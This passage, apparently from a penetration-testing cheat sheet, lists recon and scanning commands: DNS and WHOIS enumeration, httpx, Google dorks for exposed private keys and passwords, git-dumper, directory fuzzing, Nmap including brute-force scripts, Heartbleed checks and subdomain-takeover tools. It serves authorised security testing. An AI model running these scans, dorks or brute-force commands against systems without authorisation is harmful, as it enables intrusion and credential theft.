grep -Po '(?\u003c=has\\ address\\ )[^\\s]+(?\u003c!\\.)'); if [[ ! -z $res ]]; then echo \"${subdomain} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a subdomains_to_ips.txt\n\ngrep -Po '(?\u003c=\\|\\ )[^\\s]+' subdomains_to_ips.txt | sort -uf | tee -a ips.txt\n```\n\nCheck if domains/subdomains are alive with [httpx](#httpx). Check if IPs are alive with [Nmap](#nmap) doing the ping sweep.\n\nGather virtual hosts for the given IPs (ask for `PTR` records):\n\n```bash\nfor ip in $(cat ips.txt); do res=$(host -t PTR \"${ip}\" | grep -Po '(?\u003c=domain\\ name\\ pointer\\ )[^\\s]+(?\u003c!\\.)'); if [[ ! -z $res ]]; then echo \"${ip} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a ips_to_subdomains.txt\n\ngrep -Po '(?\u003c=\\|\\ )[^\\s]+' ips_to_subdomains.txt | sort -uf | tee -a subdomains.txt\n```\n\n\\[Subdomain Takeover\\] Gather canonical names for the given error domains/subdomains (ask for `CNAME` records):\n\n```bash\nfor subdomain in $(cat subdomains_errors.txt); do res=$(host -t CNAME \"${subdomain}\" | grep -Po '(?\u003c=is\\ an\\ alias\\ for\\ )[^\\s]+(?\u003c!\\.)'); if [[ ! -z $res ]]; then echo \"${subdomain} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a subdomains_errors_to_cnames.txt\n\ngrep -Po '(?\u003c=\\|\\ )[^\\s]+' subdomains_errors_to_cnames.txt | sort -uf | tee -a subdomain_takeover.txt\n```\n\nA dead subdomain whose CNAME points at a third-party service (hosting, CDN, SaaS) is only a takeover candidate if that service lets anyone register the unclaimed name; verify against the service's own error page and sign-up flow before reporting it.\n\n### WHOIS, ASN, CIDR\n\nGather [ASNs](https://www.arin.net/resources/guide/asn) from IPs:\n\n```bash\nfor ip in $(cat ips.txt); do res=$(whois -h whois.cymru.com \"${ip}\" | grep -Poi '^\\d+'); if [[ ! -z $res ]]; then echo \"${ip} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a ips_to_asns.txt\n\ngrep -Po '(?\u003c=\\|\\ )(?(?!\\ \\|).)+' ips_to_asns.txt | sort -uf | tee -a asns.txt\n```\n\nGather [CIDRs](https://www.arin.net/resources/guide/asn) from ASNs:\n\n```bash\nfor asn in $(cat asns.txt); do res=$(whois -h whois.radb.net -i origin \"AS${asn}\" | grep -Poi '(?\u003c=route\\:)[\\s]+\\K.+'); if [[ ! 
-z $res ]]; then echo \"AS${asn} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a asns_to_cidrs.txt\n\ngrep -Po '(?\u003c=\\|\\ )(?(?!\\ \\|).)+' asns_to_cidrs.txt | sort -uf | tee -a cidrs.txt\n```\n\n\\[Subdomain Takeover\\] Gather organization names from IPs:\n\n```bash\nfor ip in $(cat ips.txt); do res=$(whois -h whois.arin.net \"${ip}\" | grep -Po '(?\u003c=OrgName\\:)[\\s]+\\K.+'); if [[ ! -z $res ]]; then echo \"${ip} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a ips_to_organization_names.txt\n\ngrep -Po '(?\u003c=\\|\\ )(?(?!\\ \\|).)+' ips_to_organization_names.txt | sort -uf | tee -a organization_names.txt\n```\n\nCheck if any IP belongs to [GitHub](https://github.com) organization, read more about GitHub takeover in this [H1 article](https://www.hackerone.com/application-security/guide-subdomain-takeovers).\n\n### ASNmap\n\nInstallation:\n\n```fundamental\ngo install -v github.com/projectdiscovery/asnmap/cmd/asnmap@latest\n```\n\nGet the ProjectDiscovery API key from [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) and run:\n\n```fundamental\nasnmap -auth\n```\n\nGather [CIDRs](https://www.arin.net/resources/guide/asn) from ASN:\n\n```bash\nasnmap -r resolvers.txt -a asn | tee -a asnmap_cidr_results.txt\n```\n\nGather [CIDRs](https://www.arin.net/resources/guide/asn) from organization ID:\n\n```bash\nasnmap -r resolvers.txt -org id | tee -a asnmap_cidr_results.txt\n```\n\n### httpx\n\nCheck if domains/subdomains are alive, map live hosts:\n\n```bash\nhttpx-toolkit -o httpx_results.txt -l subdomains_errors_none.txt\n\nhttpx-toolkit -random-agent -json -o httpx_results.json -threads 100 -timeout 3 -l subdomains_errors_none.txt -ports 80,443,8008,8080,8403,8443,9008,9080,9403,9443\n```\n\nFilter out domains/subdomains from the JSON results:\n\n```bash\njq -r 'select(.\"status-code\" | tostring | test(\"^2|^3|^4\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long.txt\n\njq -r 'select(.\"status-code\" | tostring | 
test(\"^2\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^2|^4\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx_4xx.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^3\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_3xx.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^401$\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_401.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^403$\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_403.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^4\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_4xx.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^5\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_5xx.txt\n\ngrep -Po 'http\\:\\/\\/[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_http.txt\n\ngrep -Po 'https\\:\\/\\/[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_https.txt\n\ngrep -Po '(?\u003c=\\:\\/\\/)[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short.txt\n\ngrep -Po '(?\u003c=http\\:\\/\\/)[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_http.txt\n\ngrep -Po '(?\u003c=https\\:\\/\\/)[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_https.txt\n\ngrep -Po '(?\u003c=\\:\\/\\/)[^\\s\\:]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live.txt\n```\n\nCheck if a directory exists on a web server:\n\n```bash\nhttpx-toolkit -status-code -content-length -o httpx_results.txt -l subdomains_live_long.txt -path /.git\n```\n\n### gau\n\nGather URLs from the [wayback machine](https://archive.org):\n\n```bash\ngetallurls somedomain.com | tee gau_results.txt\n\nfor subdomain in $(cat subdomains_live.txt); do getallurls \"${subdomain}\"; done | sort -uf | 
tee gau_results.txt\n```\n\nCheck which of the archived URLs are still alive and filter them by status code:\n\n```bash\nhttpx-toolkit -random-agent -json -o httpx_gau_results.json -threads 100 -timeout 3 -r resolvers.txt -l gau_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^2|^3|^4\")).url' httpx_gau_results.json | sort -uf | tee gau_2xx_3xx_4xx_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^3\")).url' httpx_gau_results.json | sort -uf | tee gau_3xx_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^401$\")).url' httpx_gau_results.json | sort -uf | tee gau_401_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^403$\")).url' httpx_gau_results.json | sort -uf | tee gau_403_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^4\")).url' httpx_gau_results.json | sort -uf | tee gau_4xx_results.txt\n```\n\n### urlhunter\n\nInstallation:\n\n```bash\ngo install -v github.com/utkusen/urlhunter@latest\n```\n\nGather URLs from URL shortening services:\n\n```fundamental\nurlhunter -o urlhunter_results.txt -date latest -keywords keywords.txt\n```\n\n### Google Dorks\n\nGoogle Dork databases:\n\n* [exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database)\n* [cxsecurity.com/dorks](https://cxsecurity.com/dorks)\n* [pentest-tools.com/information-gathering/google-hacking](https://pentest-tools.com/information-gathering/google-hacking)\n* [opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt](https://github.com/opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt)\n\nCheck the list of `/.well-known/` files [here](https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml).\n\nGoogle Dorking generally will not show directories or files that are disallowed in `robots.txt`; to check for such directories and files use [httpx](#httpx) with the `Disallow` paths as input.\n\nAppend `site:www.somedomain.com` to limit your scope to a specified domain/subdomain. Append `site:*.somedomain.com` to limit your scope to all subdomains. 
Append `site:*.somedomain.com -www` to exclude the `www` subdomain from the results.\n\nSimple Google Dorks:\n\n```fundamental\ninurl:/robots.txt intext:disallow ext:txt\n\ninurl:/.well-known/security.txt ext:txt\n\ninurl:/info.php intext:\"php version\" ext:php\n\nintitle:\"index of /\" intext:\"parent directory\"\n\nintitle:\"index of /.git\" intext:\"parent directory\"\n\ninurl:/gitweb.cgi\n\nintitle:\"Dashboard [Jenkins]\"\n\n(intext:\"mysql database\" AND intext:db_password) ext:txt\n\nintext:-----BEGIN PGP PRIVATE KEY BLOCK----- (ext:pem OR ext:key OR ext:txt)\n```\n\n### Chad\n\nFind and download files using a Google Dork (quote the `site:` glob so zsh does not try to expand it):\n\n```fundamental\nmkdir chad_downloads\n\nchad -nsos -o chad_downloads_results.json -dir chad_downloads -tr 100 -q \"ext:txt OR ext:pdf OR ext:doc OR ext:docx OR ext:xls OR ext:xlsx\" -s '*.somedomain.com'\n```\n\nExtract authors (and more) from the downloaded files:\n\n```bash\napt-get -y install libimage-exiftool-perl\n\nexiftool -S chad_downloads | grep -Po '(?\u003c=Author\\:\\ ).+' | sort -uf | tee -a people.txt\n```\n\nFind directory listings using a Google Dork:\n\n```fundamental\nchad -nsos -o chad_directory_listings_results.json -tr 100 -q 'intitle:\"index of /\" intext:\"parent directory\"' -s '*.somedomain.com'\n```\n\nMore about my project at [ivan-sincek/chad](https://github.com/ivan-sincek/chad).\n\n### PhoneInfoga\n\nDownload the latest version from [GitHub](https://github.com/sundowndev/phoneinfoga/releases) and check how to [install](#0-install-tools-and-setup) the tool.\n\nGet information about a phone number:\n\n```fundamental\nphoneinfoga scan -n +1111111111\n```\n\nGet information about a phone number through the web UI:\n\n```fundamental\nphoneinfoga serve\n```\n\nNavigate to `http://localhost:5000` with your preferred web browser.\n\n### git-dumper\n\nTry to reconstruct a Git repository, i.e., get the source code, based on the commit history from a publicly exposed `/.git` directory:\n\n```fundamental\ngit-dumper https://somesite.com/.git 
git_dumper_results\n```\n\nThis tool might not be able to reconstruct the whole repository every time, but it could still reveal some sensitive information.\n\nSome additional `git` commands to try on the cloned `/.git` directory:\n\n```fundamental\ngit status\n\ngit log\n\ngit checkout -- .\n\ngit restore .\n```\n\nUse [Google Dorking](#google-dorks) and [Chad](#chad) to find more targets.\n\n### TruffleHog\n\nInstallation:\n\n```bash\ngit clone https://github.com/trufflesecurity/trufflehog \u0026\u0026 cd trufflehog\n\ngo install\n```\n\nSearch for sensitive keys inside a single repository or the whole organization on GitHub:\n\n```fundamental\ntrufflehog git https://github.com/trufflesecurity/test_keys --only-verified --json\n\ntrufflehog github --org=trufflesecurity --only-verified --json\n```\n\nSearch for sensitive keys inside files and directories:\n\n```fundamental\ntrufflehog filesystem somefile_1.txt somefile_2.txt somedir1 somedir2\n```\n\nMore about the project at [trufflesecurity/trufflehog](https://github.com/trufflesecurity/trufflehog).\n\n### File Scraper\n\nTO DO: Finish.\n\nMore about the project at [ivan-sincek/file-scraper](https://github.com/ivan-sincek/file-scraper).\n\n### katana\n\nInstallation:\n\n```fundamental\ngo install -v github.com/projectdiscovery/katana/cmd/katana@latest\n```\n\nCrawl a website:\n\n```fundamental\nkatana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u https://somesite.com/home\n\nkatana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u subdomains_live_long_2xx.txt\n```\n\n### Scrapy Scraper\n\nCrawl a website, download, and beautify \\[minified\\] JavaScript files:\n\n```fundamental\nscrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u https://somesite.com/home\n\nscrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u subdomains_live_long_2xx.txt\n```\n\nIn case you get no results while using Playwright's headless 
browser, try updating it:\n\n```fundamental\npip3 install --upgrade playwright\n\nplaywright install chromium\n```\n\nMore about my project at [ivan-sincek/scrapy-scraper](https://github.com/ivan-sincek/scrapy-scraper).\n\nScrape the JavaScript files using [TruffleHog](#trufflehog) and [File Scraper](#file-scraper).\n\n### Directory Fuzzing\n\n**Don't forget that GNU/Linux OS has a case-sensitive file system, so make sure to use the right wordlists.**\n\nIf you don't get any hits while brute forcing directories, try to brute force files by specifying file extensions.\n\nThe below tools support recursive directory and file search. Also, they might take a long time to finish depending on the used settings and wordlist.\n\n### DirBuster\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/img/dirbuster.png\" alt=\"DirBuster\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 1 - DirBuster\u003c/p\u003e\n\nAll DirBuster's wordlists are located at `/usr/share/dirbuster/wordlists/` directory.\n\n### feroxbuster\n\nBrute force directories on a web server (JSON output, so the results can be filtered with `jq` below):\n\n```fundamental\ncat subdomains_live_long.txt | feroxbuster --stdin -k -n --auto-bail --random-agent -t 50 -T 3 --json -o feroxbuster_results.json -s 200,301,302,401,403 -w directory-list-lowercase-2.3-medium.txt\n```\n\nThis tool is faster than [DirBuster](#dirbuster).\n\nFilter out directories from the results:\n\n```bash\njq -r 'select(.status | tostring | test(\"^2\")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx.txt\n\njq -r 'select(.status | tostring | test(\"^2|^4\")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx_4xx.txt\n\njq -r 'select(.status | tostring | test(\"^3\")).url' feroxbuster_results.json | sort -uf | tee -a directories_3xx.txt\n\njq -r 'select(.status | tostring | test(\"^401$\")).url' feroxbuster_results.json | sort -uf | tee -a directories_401.txt\n\njq -r 'select(.status | 
tostring | test(\"^403$\")).url' feroxbuster_results.json | sort -uf | tee -a directories_403.txt\n\njq -r 'select(.status | tostring | test(\"^4\")).url' feroxbuster_results.json | sort -uf | tee -a directories_4xx.txt\n\njq -r 'select(.status | tostring | test(\"^5\")).url' feroxbuster_results.json | sort -uf | tee -a directories_5xx.txt\n```\n\n| Option | Description |\n| --- | --- |\n| -u | The target URL (required, unless \\[--stdin \\| --resume-from\\] is used) |\n| --stdin | Read URL(s) from STDIN |\n| -a/-A | Sets the User-Agent (default: feroxbuster\\/x.x.x) \\/ Use a random User-Agent |\n| -x | File extension(s) to search for (ex: -x php -x pdf,js) |\n| -m | Which HTTP request method(s) should be sent (default: GET) |\n| --data | Request's body; can read data from a file if input starts with an \\@(ex: \\@post.bin) |\n| -H | Specify HTTP headers to be used in each request (ex: -H header:val -H 'stuff:things') |\n| -b | Specify HTTP cookies to be used in each request (ex: -b stuff=things) |\n| -Q | Request's URL query parameters (ex: -Q token=stuff -Q secret=key) |\n| -f | Append \\/ to each request's URL |\n| -s | Status Codes to include (allow list) (default: 200,204,301,302,307,308,401,403,405) |\n| -T | Number of seconds before a client's request times out (default: 7) |\n| -k | Disables TLS certificate validation for the client |\n| -t | Number of concurrent threads (default: 50) |\n| -n | Do not scan recursively |\n| -w | Path to the wordlist |\n| --auto-bail | Automatically stop scanning when an excessive amount of errors are encountered |\n| -B | Automatically request likely backup extensions for \"found\" URLs (default: ~, .bak, .bak2, .old, .1) |\n| -q | Hide progress bars and banner (good for tmux windows w/ notifications) |\n| -o | Output file to write results to (use w/ --json for JSON entries) |\n\n### snallygaster\n\nDownload the latest version from [GitHub](https://github.com/hannob/snallygaster/releases). 
See how to [install](#0-install-tools-and-setup) the tool.\n\nSearch a web server for sensitive files:\n\n```bash\nsnallygaster --nowww somesite.com | tee snallygaster_results.txt\n\nfor subdomain in $(cat subdomains_live_short_http.txt); do snallygaster --nohttps --nowww \"${subdomain}\"; done | tee snallygaster_http_results.txt\n\nfor subdomain in $(cat subdomains_live_short_https.txt); do snallygaster --nohttp --nowww \"${subdomain}\"; done | tee snallygaster_https_results.txt\n```\n\n### IIS Tilde Short Name Scanning\n\nDownload:\n\n```bash\ngit clone https://github.com/irsdl/IIS-ShortName-Scanner \u0026\u0026 cd IIS-ShortName-Scanner/release\n```\n\nSearch an IIS server for files and directories:\n\n```fundamental\njava -jar iis_shortname_scanner.jar 2 30 https://somesite.com\n```\n\n### WhatWeb\n\nIdentify a website:\n\n```fundamental\nwhatweb -v somesite.com\n```\n\n### Parsero\n\nTest all `robots.txt` entries:\n\n```fundamental\nparsero -sb -u somesite.com\n```\n\n### EyeWitness\n\nGrab screenshots from websites:\n\n```fundamental\neyewitness --no-prompt --no-dns --timeout 3 --threads 5 -d eyewitness_results -f subdomains_live_long.txt\n```\n\nTo check the screenshots, navigate to `eyewitness_results/screens` directory.\n\n### Wordlists\n\nYou can find `rockyou.txt` inside `/usr/share/wordlists/` directory or inside [SecLists](https://github.com/danielmiessler/SecLists) - a useful collection of multiple types of wordlists for security assessments.\n\nInstall SecLists (the collection will be stored at `/usr/share/seclists/` directory):\n\n```bash\napt-get update \u0026\u0026 apt-get install seclists\n```\n\nMy contribution to the SecLists: [danielmiessler/SecLists/tree/master/Fuzzing/Amounts](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/Amounts)\n\nOther popular wordlist collections:\n\n* [ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)\n* [xmendez/wfuzz](https://github.com/xmendez/wfuzz)\n* 
[assetnote/commonspeak2-wordlists](https://github.com/assetnote/commonspeak2-wordlists)\n* [weakpass.com/wordlist](https://weakpass.com/wordlist)\n* [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists)\n\n## 2. Scanning/Enumeration\n\nKeep in mind that web applications or services can be hosted on other ports besides 80 (HTTP) and 443 (HTTPS), e.g., they can be hosted on port 8443 (HTTPS).\n\nKeep in mind that on ports 80 (HTTP) and 443 (HTTPS) a web server can host different web applications or services. Use [Ncat](#ncat) or Telnet for banner grabbing.\n\nKeep in mind that on different URL paths a web server can host different web applications or services, e.g., `somesite.com/app_one/` and `somesite.com/app_two/`.\n\nWhile scanning for vulnerabilities or running other intensive scans, periodically check whether the web application or service has crashed, so that you can alert your client as soon as possible; also check whether you got rate limited by the web application firewall (WAF) or some other security product, so that you can pause your scans, because all your subsequent requests will be blocked and your results will not be complete.\n\nIf a web application or service all of a sudden stops responding, try to access the web application or service using your mobile data, i.e., using a different IP. 
It is possible that your current IP was temporarily blocked.\n\nSend an email message to a non-existent address at the target's domain; the resulting non-delivery notification (NDN) will often reveal useful internal network information.\n\nGet a free [Nessus Community](https://community.tenable.com/s/article/Nessus-Essentials), and if you can afford it, get [Burp Suite Professional](https://portswigger.net/burp) or [Caido](https://caido.io).\n\n### 2.1 Useful Websites\n\n* [ipaddressguide.com/cidr](https://www.ipaddressguide.com/cidr)\n* [account.arin.net/public/cidrCalculator](https://account.arin.net/public/cidrCalculator)\n* [calculator.net/ip-subnet-calculator.html](https://www.calculator.net/ip-subnet-calculator.html)\n* [speedguide.net/ports.php](https://www.speedguide.net/ports.php)\n* [securityheaders.com](https://securityheaders.com)\n* [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) - Content Security Policy evaluator\n\n### Nmap\n\n**For better results, use IPs instead of domain names.**\n\nPing sweep, map live hosts:\n\n```fundamental\nnmap -sn -oG nmap_ping_sweep_results.txt 192.168.8.0/24\n\nnmap -sn -oG nmap_ping_sweep_results.txt -iL cidrs.txt\n```\n\n**Some web servers will not respond to ping (ICMP) requests, so the mapping of the live hosts will not be accurate.**\n\nExtract live hosts from the results:\n\n```bash\ngrep -Po '(?\u003c=Host\\:\\ )[^\\s]+' nmap_ping_sweep_results.txt | sort -uf | tee -a ips_live.txt\n```\n\nTCP scan, all ports:\n\n```fundamental\nnmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- 192.168.8.0/24\n\nnmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- -iL cidrs.txt\n```\n\nAutomate TCP scan:\n\n```bash\nmkdir nmap_tcp_results\n\nfor ip in $(cat ips_live.txt); do nmap -nv -sS -sV -sC -Pn -oN \"nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt\" -p- \"${ip}\"; done\n```\n\nUDP scan, only important ports:\n\n```fundamental\nnmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 
53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 192.168.8.0/24\n\nnmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -iL cidrs.txt\n```\n\nAutomate UDP scan (the loop variable is `ip`, the same as in the TCP loop above):\n\n```bash\nmkdir nmap_udp_results\n\nfor ip in $(cat ips_live.txt); do nmap -nv -sU -sV -sC -Pn -oN \"nmap_udp_results/nmap_udp_results_${ip//./_}.txt\" -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 \"${ip}\"; done\n```\n\n| Option | Description |\n| --- | --- |\n| -sn | Ping scan - disable port scan |\n| -Pn | Treat all hosts as online -- skip host discovery |\n| -n/-R | Never do DNS resolution/Always resolve (default: sometimes) |\n| -sS/sT/sA | TCP SYN/Connect()/ACK |\n| -sU | UDP scan |\n| -p/-p- | Only scan specified ports/Scan all ports |\n| --top-ports | Scan \u003cnumber\u003e most common ports |\n| -sV | Probe open ports to determine service/version info |\n| -O | Enable OS detection |\n| -sC | Same as --script=default |\n| --script | Script scan (takes time to finish) |\n| --script-args | Provide arguments to scripts |\n| --script-help | Show help about scripts |\n| -oN/-oX/-oG | Output scan in normal, XML, and Grepable format |\n| -v | Increase verbosity level (use -vv or more for greater effect) |\n| --reason | Display the reason a port is in a particular state |\n| -A | Enable OS detection, version detection, script scanning, and traceroute |\n\nAll Nmap's scripts are located at `/usr/share/nmap/scripts/` directory. 
Read more about the scripts [here](https://nmap.org/nsedoc).\n\nNSE examples:\n\n```fundamental\nnmap -nv --script='mysql-brute' --script-args='userdb=\"users.txt\", passdb=\"rockyou.txt\"' 192.168.8.5 -p 3306\n\nnmap -nv --script='dns-brute' --script-args='dns-brute.domain=\"somedomain.com\", dns-brute.hostlist=\"subdomains-top1mil.txt\"'\n\nnmap -nv --script='ssl-heartbleed' -iL cidrs.txt\n```\n\nYou can find `rockyou.txt` and `subdomains-top1mil.txt` wordlists in [SecLists](#wordlists).\n\nI prefer to use [Nuclei](#nuclei) for vulnerability scanning.\n\n### testssl.sh\n\nInstallation:\n\n```bash\napt-get update \u0026\u0026 apt-get -y install testssl.sh\n```\n\nTest an SSL/TLS certificate (e.g., SSL/TLS ciphers, protocols, etc.):\n\n```fundamental\ntestssl --openssl /usr/bin/openssl -oH testssl_results.html somesite.com\n```\n\nYou can also use testssl.sh to exploit SSL/TLS vulnerabilities.\n\n### OpenSSL\n\nTest a web server for Heartbleed vulnerability:\n\n```bash\nfor subdomain in $(cat subdomains_live.txt); do res=$(echo \"Q\" | openssl s_client -connect \"${subdomain}:443\" 2\u003e\u00261 | grep 'server extension \"heartbeat\" (id=15)'); if [[ ! -z $res ]]; then echo \"${subdomain}\"; fi; done | tee openssl_heartbleed_results.txt\n\n# omit the URL scheme\nfor subdomain in $(cat subdomains_live_short_https.txt); do res=$(echo \"Q\" | openssl s_client -connect \"${subdomain}\" 2\u003e\u00261 | grep 'server extension \"heartbeat\" (id=15)'); if [[ ! -z $res ]]; then echo \"${subdomain}\"; fi; done | tee openssl_heartbleed_results.txt\n```\n\n### keytool\n\nGrab SSL/TLS certificate:\n\n```fundamental\nkeytool -printcert -rfc -sslserver somesite.com \u003e keytool_results.txt\n\nopenssl x509 -noout -text -in keytool_results.txt\n```\n\nUse [uncover](#uncover) with Shodan and Censys SSL/TLS Dorks to find more in-scope hosts.\n\n## 3. 
Vulnerability Assessment/Exploiting\n\nAlways try the null session login, i.e., no password login, or search the Internet for default credentials for a specific web application.\n\nTry to manipulate cookies or JWT tokens to gain access or elevate privileges. On logout, always check if any of the cookies or JWT tokens are still valid.\n\nAlways inspect web browser's local storage, especially if testing a single-page application (SPA).\n\nTry to transform, e.g., an HTTP POST request into an HTTP GET request, i.e., into a query string, and see how a server will react to it.\n\nTurn off JavaScript in your web browser and check the web application behaviour again.\n\nCheck the web application behaviour on a mobile device as some features might work differently. Try spoofing your User-Agent or try visiting `m.somesite.com`.\n\nIf you want to automate your code injection testing, check the [Wordlists](#wordlists) sub-section for code injection wordlists. Some of the wordlists also include obfuscated code injections.\n\nIf you see any amounts or quantities, try to use [danielmiessler/SecLists/tree/master/Fuzzing/Amounts](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/Amounts) wordlist as it might cause unintended behavior, errors, or even bypass the minimum and maximum boundaries.\n\n**Don't forget to clean up after yourself. Remove all the created artifacts, incl. 
malware, exploits, tools, scripts, etc., and revert all the settings and changes from a target host after you are done testing.**\n\n### 3.1 Useful Websites\n\n* [cvedetails.com](https://www.cvedetails.com)\n* [exploit-db.com](https://www.exploit-db.com)\n* [cxsecurity.com](https://cxsecurity.com/wlb)\n* [hakluke/weaponised-XSS-payloads](https://github.com/hakluke/weaponised-XSS-payloads)\n* [namecheap.com](https://www.namecheap.com) - buy domains for cheap\n* [streaak/keyhacks](https://github.com/streaak/keyhacks) - validate API keys\n* [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n* [jwt.io](https://jwt.io)\n* [portswigger.net/web-security](https://portswigger.net/web-security)\n* [bigiamchallenge.com](https://bigiamchallenge.com) - nice AWS CTF\n\n### Collaborator Servers\n\nUsed when trying to exploit an open redirect, blind cross-site scripting (XSS), DNS and HTTP interactions, etc.\n\n* [interactsh.com](https://app.interactsh.com)\n* [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator)\n* [canarytokens.org](https://canarytokens.org/generate)\n* [webhook.site](https://webhook.site)\n\n### Subdomain Takeover\n\nGather as much information as you can for a specified target, see how in [1. Reconnaissance](#1-reconnaissance).\n\nGather organization names with [WHOIS](#whois-asn-cidr), and canonical names with [host](#host).\n\nYou can double check whether domains/subdomains are dead with [dig](#dig) or alive with [httpx](#httpx).\n\nCheck if hosting providers for the found domains/subdomains are vulnerable to domain/subdomain takeover at [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz). 
Credits to the author!\n\nBiggest cloud service providers:\n\n* [aws.amazon.com](https://aws.amazon.com)\n* [azure.microsoft.com](https://azure.microsoft.com)\n* [cloud.google.com](https://cloud.google.com)\n* [wordpress.com](https://wordpress.com)\n* [shopify.com](https://www.shopify.com)\n\n### Subzy\n\nInstallation:\n\n```fundamental\ngo install -v github.com/lukasikic/subzy@latest\n```\n\nCheck for domains/subdomains takeover:\n\n```fundamental\nsubzy -concurrency 100 -timeout 3 -targets subdomains_errors.txt | tee subzy_results.txt\n```\n\n### subjack\n\nInstallation:\n\n```bash\ngo install -v github.com/haccer/subjack@latest\n```\n\nCheck for domains/subdomains takeover:\n\n```fundamental\nsubjack -v -o subjack_results.json -t 100 -timeout 3 -a -m -w subdomains_errors.txt\n```\n\n### Bypassing the 401 and 403\n\nFind out how to bypass 4xx HTTP response status codes at [ivan-sincek/forbidden](https://github.com/ivan-sincek/forbidden).\n\n### Nikto\n\nScan a web server:\n\n```fundamental\nnikto -output nikto_results.txt -h somesite.com -p 80\n```\n\n### WPScan\n\nScan a WordPress website:\n\n```fundamental\nwpscan -o wpscan_results.txt --url somesite.com\n```\n\n### Nuclei\n\nInstallation and updating:\n\n```bash\ngo install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest\n\nnuclei -up \u0026\u0026 nuclei -ut\n```\n\nVulnerability scan, all templates:\n\n```bash\nnuclei -c 500 -o nuclei_results.txt -l subdomains_live_long_2xx_4xx.txt\n\ncat nuclei_results.txt | grep -Po '(?\u003c=\\]\\ ).+' | sort -uf \u003e nuclei_sorted_results.txt\n```\n\nOnly subdomain takeover:\n\n```fundamental\nnuclei -c 500 -t takeovers -o nuclei_takeover_results.txt -l subdomains_live.txt\n```\n\n### Arjun\n\nDiscover request parameters:\n\n```fundamental\narjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -u https://somesite.com\n\narjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -i 
